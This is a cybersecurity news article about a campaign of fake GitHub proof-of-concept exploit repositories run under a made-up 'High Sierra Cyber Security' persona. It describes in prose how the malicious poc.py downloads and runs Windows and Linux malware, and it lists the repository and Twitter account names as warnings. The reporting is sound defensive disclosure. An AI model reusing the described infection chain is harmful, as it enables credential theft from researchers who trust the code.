Skip to content

Fake Github PoCs are spreading Windows and Linux malware

  • by
  • 3 min read

Hackers are now impersonating security researchers on Github to spread fake zero-day proof of concept (PoC) exploits that infect Windows and Linux machines. The fake profiles come from a company named “High Sierra Cyber Security” promoting their fake PoC repositories in Github. 

The discoverers of the campaign, VulnCheck reports that it has been active since at least May 2023. The exploits include PoCs for zero-day vulnerabilities in popular consumer software like Chrome, Discord, Signal, Microsoft Exchange and Whatsapp. 

One of the fake Github profiles discovered by VulnCheck. | Source: VulnCheck

The profiles appear legitimate, complete with pictures of other real security researchers from firms like Rapid7. The profiles are also linked to social media accounts such as Twitter, presumably adding another layer of legitimacy to these otherwise bogus Github profiles. 

Regardless, every profile contains malicious repositories with a Python script named poc.py which downloads the malware installed on the target system. The script starts off by downloading a zip archive from an external URL based on the user’s operating system — cveswindows.zip for Windows and cveslinux.zip for Linux. 

Once the zip file is downloaded, the malware is tucked away in the OS’ temporary storage before extraction and execution. These directories include %temp% in Windows and /home/[username]/.local/share in Linux.

A fake Discord zero-day exploit PoC. | Source: VulnCheck

We don’t yet know what kind of malware the malicious zip files are installing, but VulnCheck reports that both executables install a Tor client with the Windows version also, including a password-stealing trojan. Luckily, the Windows malware is quickly detected as over 60% of antivirus engines on Virustotal can identify suspicious behaviour. Conversely, the Linux version is harder to detect, with only three antivirus engines picking up signs of malicious activity. 

The threat actors behind the campaign are also unknown, but they seem persistent, creating new profiles and repositories every time existing ones get flagged and deleted. We also don’t know the real-world impact of the campaign just yet. 

Overall, at the time of writing, the threat actors have the following seven malicious repositories on Github that you shouldn’t touch with a ten-foot pole. 

  • github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
  • github.com/BAdithyaHSCS/Exchange-0-Day
  • github.com/DLandonHSCS/Discord-RCE
  • github.com/GSandersonHSCS/discord-0-day-fix
  • github.com/MHadzicHSCS/Chrome-0-day
  • github.com/RShahHSCS/Discord-0-Day-Exploit
  • github.com/SsankkarHSCS/Chromium-0-Day

In addition to that, several Twitter accounts have also been created to lend more legitimacy to the fake profiles. These include:

  • twitter.com/AKuzmanHSCS
  • twitter.com/DLandonHSCS
  • twitter.com/GSandersonHSCS
  • twitter.com/MHadzicHSCS

In the News: Over 8K subreddits go dark indefinitely as CEO hopes blackout “will pass”

Yadullah Abidi

Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.

>